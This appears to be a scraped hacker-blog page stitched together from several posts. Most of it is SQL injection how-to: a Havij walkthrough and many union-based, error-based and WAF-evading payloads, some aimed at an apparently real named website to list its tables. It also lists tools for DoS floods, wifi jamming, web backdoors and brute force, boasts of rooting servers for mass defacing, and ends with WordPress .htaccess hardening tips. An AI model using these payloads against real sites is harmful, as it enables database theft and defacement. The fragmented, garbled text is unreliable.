How To Use Havij SQL Injection Tool
What Is Havij ?
From Where To Download It ?
How To Use Havij ?
If You Dont Know How To Find Vulnerable Website Than Wait 1 or 2 day(s) I’ll Make Tut On It 😛
Than Click On Get Data
Than Click On Get Data
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/aclsiosj/public_html/news.php on line 27
 http://www.acls.in/news.php?id=-10 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()–+-
http://www.acls.in/news.php?id=-10 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=0x757365725f6d6173746572–+-
 Now We Have Column Names ;P :v
Features~
 |  CAST.V2  |
      -------------
            |
            |
--------------------------
| Information Gathering  |-------------- 1) Scan Live Host
--------------------------Â Â Â Â Â Â Â Â |---- 2) Port Scaner
            |                      |---- 3) Network Trafic with Kismet
            |                      |---- 4) Network Monitoring with Netdiscover
            |                      I---- 5) Detect Netcut!
-----------------------
| Exploitation Tools  |---------------- 6) Blocked Access Point
-----------------------Â Â Â Â Â Â Â Â Â Â I---- 7) Netcut With Tcpkill
            |
            |
      --------------
      | Honeypots  |-------------------- 8) Install Honeypot
      --------------              I---- 9) Create Fake Access Point
            |
            |
    -------------------
    | Stress Testing  |----------------- 10) DOS Attack With Hping3
    -------------------            |---- 11) UDP Flood with Udp.pl
            |                      |---- 12) Dos Attack With Slowloris
            |                      |---- 13) Flood Access Point
            |                      |---- 14) WifiJammer
            |                      I---- 15) Kick All Client From wifi
  ----------------------
  | Network Forensics  |--------------- 16) Network Forensic With Wireshark
  ----------------------          I---- 17) Image Captures With driftnet
            |
      -----------
      | Service |---------------------- 18) Credits And About
      -----------
            |
      -----------
      |  EXIT  |
      -----------
Ans – Getting access to the user =”r00t” Master,admin,main user blah bla..
root Server To Get Full Access To The server..y0u can d0 many thing after r00ting the server..Ex-: Mass DefacingÂ
 TooLs/
uname -a
mkdir tmp Â
/ its always writable 😉Â
Âwww.site.com/index.php?id=1
but the problem is that order by is not working
you entered this command:-site.com/index.php?id=1 order by 1--
<< no eror
site.com/index.php?id=1 order by 5--
<<no eror
site.com/index.php?id=1 order by 100--
<< no eror.. wtf !!!
if you get this problem then use sqli string based and put this command:-
site.com/index.php?id=1' order by 1--+-
<<no eror
site.com/index.php?id=1' order by 5--+-
<<no eror
site.com/index.php?id=1' order by 100--+-
<<eror :)
* some times if you get problems by using order by e.g
site.com/index.php?id=1 order by 100--
<<no eror
or
Code:
site.com/index.php?id=1 order by 1--
<<eror
site.com/index.php?id=1 order by 1/*
site.com/index.php?id=1 order by 5/*here are some more quries like:
-- - ,, --++- ,, -++--,,
* ok while injecting a site if you see that there are no usefull table..!
like (admin,auth,users,members,login) etc then remember every site have different number of schemas
and there are different tables in every schema and you will get schema names by this command:-
site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata
and then tables from different schema using this:-
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x
Column Names:-
site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x and table_name=0x
hope it will help you :)
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables
site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1--
site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1
site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1--
hope it will help you :)
illegal mix of collection
or something like this
site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4--
site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4--
site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4--
site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4--
mostly unhex(hex)) use to bypass illegal mix of collection eror..
if still not working then you should use this:-site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version))),4--
* WAF (Web Application Firewal)
WAF stands for (Web Application Firewal) it blocks the commands and queries it will not block “order by”
but it will block your command “union select” and while using “union select” you will get this eror:-
404 forbidden you do not have permission to access blah blah
not acceptible you do not have to permission blah blah
site.com/index.php?id=1 UnIoN SeLeCt 1,2,CoNcAt(version()),4--
* site.com/index.php?id=1 UnIoN SeLeCt 1,2,CoNcAt(/*!table_name*/),4 from /*!information_schema*/.tables--
site.com/index.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2,CoNcAt(/*!table_name*/),4 from /*!information_schema*/.tables
* site.com/index.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2,/*!CoNcAt*/(/*!table_name*/),4 from /*!information_schema*/.tables
==============================================
It Will Surely Help You ;)
www.site.com/index.php?id=-1+and+(select+1+from(select
count(*),concat((select+concat(version())+from+information_schema.tables+limit+0 ​,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
www.site.com/index.php?id=-1+and+(select+1+from(select
count(*),concat((select+concat(table_name)+from+information_schema.tables+where+ ​ table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.ta ​bles+group+by+a)b)
http://www.site.com/index.php?id=1 oR 1 group by concat_ws(0x3a,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1–
[+] The Weapon Of Mass Destruction IP-DiggEr v4.0 Released xD
[+] Project Name :- IP-DiggEr v4.o The Next Level
Features Of IP-DiggEr v4.0 The WeB Xploit3r The Next Level
FTP Brute Force
Admin Panel Finder
Website Vulnerability Scanning To0ls
——————————————–
Joomla Vulnerability Scanner
WordPress Vulnerability Scanner
UniScan -> Web Vulnerability Scanner
——————————————–
Uploaded Shell Finder ( Website )
——————————————–
Web-Backd0or ( Weevely )
——————————————–
Web Backd0or Generator ( Weevely )
Web Backd0or Server Connect0r ( Weevely )
Other Hacking To0lKit
——————————————–
W3bSploit T0olkit by 0x0ptim0us
==============================================
Ip- DiggEr v4.0 The WeB Xploit3r The Next Level
Download Link :- Ip DIGGER 4 Download
Link To The Usage Of IP digger ~ How To Use Ip DIGGER
No Virus Is Been Detected~
TurkGuvenligiwe told you to ban this fake user >>>http://www.1337day.com/author/5819
is it so difficult or you are so stupid?
Fuck all exploit kiddies, Fuck all exploit sellers 🙂
ip-digger3.sh.xÂ
ip.sh
./ip.sh
 1. -Past-2. -Present-3. -Future-
1. -Past-
2. -Present-
Wp-Config Protection
order allow,deny
deny from all
Wp-Admin Login Protection
 order deny,allowÂ
allow from 202.090.21.1 (replace with your IP address)Â
deny from all
Disabling Directory Listings,
 # directory browsingÂ
Options All -Indexes
Prevent wp-content Access
Order deny,allowÂ
Deny from all
Â
Allow from all
Â
order allow,denyÂ
deny from allÂ
satisfy allÂ
 Â
Some Tips,
always Choose Good CMS For BloggingÂ
Good Hosting Provider
dont Mess With Hackers
==============================
kidsec.com
Written By Zaid Sparrow
Dont Leech
Be Secured
Glitch , Bitch And Ditch - Be Aware.
========================
Â